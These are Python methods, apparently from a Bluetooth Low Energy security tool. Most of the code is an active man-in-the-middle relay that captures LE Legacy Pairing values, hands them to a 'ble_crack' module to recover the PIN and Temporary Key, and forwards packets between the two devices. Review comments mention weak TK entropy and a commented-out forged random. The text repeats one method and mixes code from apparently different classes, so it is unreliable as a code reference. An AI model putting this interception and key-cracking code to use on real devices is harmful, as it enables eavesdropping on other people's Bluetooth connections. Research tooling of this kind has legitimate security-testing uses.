def masterPairingRandom(self, packet):
    """Process a Pairing Random received from the master (initiator) side.

    Nothing happens unless the module is in the ACTIVE_MITM stage. In that
    stage the random is stored byte-reversed in ``self.mRand``, the captured
    pairing material is passed to the ``ble_crack`` module, and the original
    packet is relayed unchanged to the slave through ``self.a2sEmitter``.

    On success ``self.pin`` and ``self.temporaryKey`` come from the module's
    output; otherwise they fall back to ``0`` and sixteen zero bytes.

    NOTE(review): ``ble_crack`` presumably recovers the Temporary Key offline
    from the confirm/random exchange; confirm against that module. If so,
    this only works because an LE Legacy Pairing TK has very little entropy.
    Deployments needing protection against an interposed device should
    require LE Secure Connections.
    """
    if self.getStage() != BLEMitmStage.ACTIVE_MITM:
        return

    rand_hex = packet.random.hex()
    io.info("Pairing Random (from master) : random = " + rand_hex)
    io.info("Storing mRand : " + rand_hex)
    # Kept byte-reversed relative to the packet field; presumably the order
    # the crypto helpers expect (verify against ble.BLECrypto).
    self.mRand = packet.random[::-1]

    def address_kind(raw_type):
        # b"\x00" is mapped to "public"; any other value to "random".
        return "public" if raw_type == b"\x00" else "random"

    cracker = utils.loadModule("ble_crack")
    parameters = (
        ("MASTER_RAND", self.mRand.hex()),
        ("PAIRING_REQUEST", self.pReq.hex()),
        ("PAIRING_RESPONSE", self.pRes.hex()),
        ("INITIATOR_ADDRESS_TYPE", address_kind(self.initiatorAddressType)),
        ("INITIATOR_ADDRESS", self.initiatorAddress),
        ("RESPONDER_ADDRESS_TYPE", address_kind(self.responderAddressType)),
        ("RESPONDER_ADDRESS", self.responderAddress),
        ("MASTER_CONFIRM", self.mConfirm.hex()),
    )
    for key, value in parameters:
        cracker[key] = value

    result = cracker.run()
    if not result["success"]:
        # No key recovered: fall back to PIN 0 and an all-zero 16-byte key.
        self.pin = 0
        self.temporaryKey = b"\x00" * 16
    else:
        recovered = result["output"]
        self.pin = int(recovered["PIN"])
        self.temporaryKey = bytes.fromhex(recovered["TEMPORARY_KEY"])

    io.info("Redirecting to slave ...")
    self.a2sEmitter.sendp(ble.BLEPairingRandom(random=packet.random))
def slavePairingRandom(self, packet):
    """Process a Pairing Random received from the slave (responder) side.

    Only acts in the ACTIVE_MITM stage: logs the value, stores it
    byte-reversed in ``self.sRand``, and relays the packet's random
    unchanged to the master through ``self.a2mEmitter``.
    """
    if self.getStage() != BLEMitmStage.ACTIVE_MITM:
        return

    rand_hex = packet.random.hex()
    io.info("Pairing Random (from slave) : random = " + rand_hex)
    io.info("Storing sRand : " + rand_hex)
    # Stored reversed; the relayed packet below keeps the received order.
    self.sRand = packet.random[::-1]

    io.info("Redirecting to master ...")
    relayed = ble.BLEPairingRandom(random=packet.random)
    self.a2mEmitter.sendp(relayed)
def slavePairingRandom(self, packet):
    """Process a Pairing Random received from the slave (responder) side.

    Only acts in the ACTIVE_MITM stage: logs the value, stores it
    byte-reversed in ``self.sRand``, and relays the packet's random
    unchanged to the master through ``self.a2mEmitter``.
    """
    if self.getStage() != BLEMitmStage.ACTIVE_MITM:
        return

    rand_hex = packet.random.hex()
    io.info("Pairing Random (from slave) : random = " + rand_hex)
    io.info("Storing sRand : " + rand_hex)
    # Stored reversed; the relayed packet below keeps the received order.
    self.sRand = packet.random[::-1]

    io.info("Redirecting to master ...")
    # Disabled in the original and never executed; the value actually
    # forwarded is the one received from the slave.
    #newRandom = ble.BLECrypto.c1m1(self.temporaryKey,self.sConfirm,self.pReq,self.pRes,self.initiatorAddressType,self.initiatorAddress,self.responderAddressType,self.responderAddress)
    #self.forgedsRand = newRandom
    #io.info("Using fake random : "+newRandom.hex())
    relayed = ble.BLEPairingRandom(random=packet.random)
    self.a2mEmitter.sendp(relayed)
def masterPairingRandom(self, pkt):
    """Answer the master's Pairing Random and verify its confirm value.

    Stores ``pkt.random`` in ``self.mRand``, replies with ``self.sRand``,
    then recomputes the master's confirm value with ``ble.BLECrypto.c1`` and
    compares it with the stored ``self.mConfirm``. On a match the Short Term
    Key is derived with ``ble.BLECrypto.s1`` and kept in ``self.stk``;
    on a mismatch ``self.failure`` is set to ``True``.

    NOTE(review): ``self.sRand`` is sent before the confirm value is checked.
    In LE Legacy Pairing the responder is expected to verify the initiator's
    confirm first and answer a mismatch with Pairing Failed, so a peer that
    fails the check still obtains sRand here. Consider moving the send after
    the comparison.

    NOTE(review): the derived STK is written to the log in clear. Treat
    captured console output as key material.
    """
    pkt.show()
    self.mRand = pkt.random

    self.emitter.sendp(ble.BLEPairingRandom(random=self.sRand))

    # c1/s1 are fed the byte-reversed randoms, as in the original call sites.
    expected_confirm = ble.BLECrypto.c1(
        self.tk,
        self.mRand[::-1],
        self.pReq,
        self.pRes,
        self.initiatorAddressType,
        self.initiatorAddress,
        self.responderAddressType,
        self.responderAddress,
    )

    confirmed = self.mConfirm == expected_confirm
    if not confirmed:
        io.fail("Confirm value failed ! Terminating ...")
        self.failure = True
        return

    io.success("Confirm Value correct !")
    self.stk = ble.BLECrypto.s1(self.tk, self.mRand[::-1], self.sRand[::-1])
    io.success("Generating Short Term Key (STK): " + self.stk.hex())
def slavePairingConfirm(self, pkt):
    """Record the slave's Pairing Confirm and reply with the master random.

    The received confirm value is kept byte-reversed in ``self.sConfirm``.
    A Pairing Random carrying ``self.mRand`` is then displayed and sent
    through ``self.emitter``.
    """
    pkt.show()
    # Stored reversed; presumably the order used when the confirm is later
    # recomputed (verify against the caller that reads self.sConfirm).
    self.sConfirm = pkt.confirm[::-1]

    reply = ble.BLEPairingRandom(random=self.mRand)
    reply.show()
    self.emitter.sendp(reply)